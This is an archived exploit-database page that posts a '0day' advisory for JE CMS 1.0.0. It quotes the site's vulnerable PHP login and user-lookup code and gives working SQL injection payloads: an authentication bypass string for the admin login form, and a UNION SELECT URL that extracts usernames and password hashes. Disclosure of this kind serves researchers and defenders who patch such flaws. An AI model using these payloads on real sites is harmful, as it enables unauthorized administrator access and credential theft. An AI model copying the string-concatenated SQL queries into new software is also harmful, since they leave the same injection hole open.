[webapps / 0day] - JE CMS 1.0.0 Bypass Authentication by SQL
Posted on 28 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 28 Sep 2010 | Exploit category: webapps / 0day | Exploit author: Abysssec | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================================= JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability ================================================================= Title : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability Affected Version : JE CMS <= 1.0.0 Vendor Site : joenasejes.cz.cc Discovery : abysssec.com Vulnerabilites : 1. Bypass Authentication by SQL Injection Vulnerability in administratorlogin.php page, lines 16-20: if (isset($_REQUEST['username'])) { $username = $_REQUEST['username']; $password = $_REQUEST['password']; $result = $core->userLogin(); userLogin() function is in administratorlibraryfunctions.php. in lines 129-139: if ($userName == '' || $password == '') { $errorMessage = JE_MISMATCH_USERNAME_PASSWORD; } else { // check the database and see if the username and password combo do match $sql = "SELECT userid FROM users WHERE username = '".$userName."' // vulnerability is here AND password = '".$this->getHash($password)."' // vulnerability is here AND usertype = 1 AND block = 0"; $result = $this->JEQuery($sql); POC: in administrator/login.php: username: admin' or '1'='1 password: admin' or '1'='1 2. SQL injection in administratorindex.php on "userid" parameter: in administratorindex.php file line 12: $userid = $_REQUEST['userid']; lines 52-53: case 'edituser' : $user = $core->getUser($userid); getUser function is in administratorlibraryfunctions.php file. lines 578-583: function getUser($id){ $sql = "SELECT * FROM users WHERE userid = ".$id; // vulnerability is here $result = $this->JEQuery($sql); POC: http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users-- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-28]</pre></body></html>
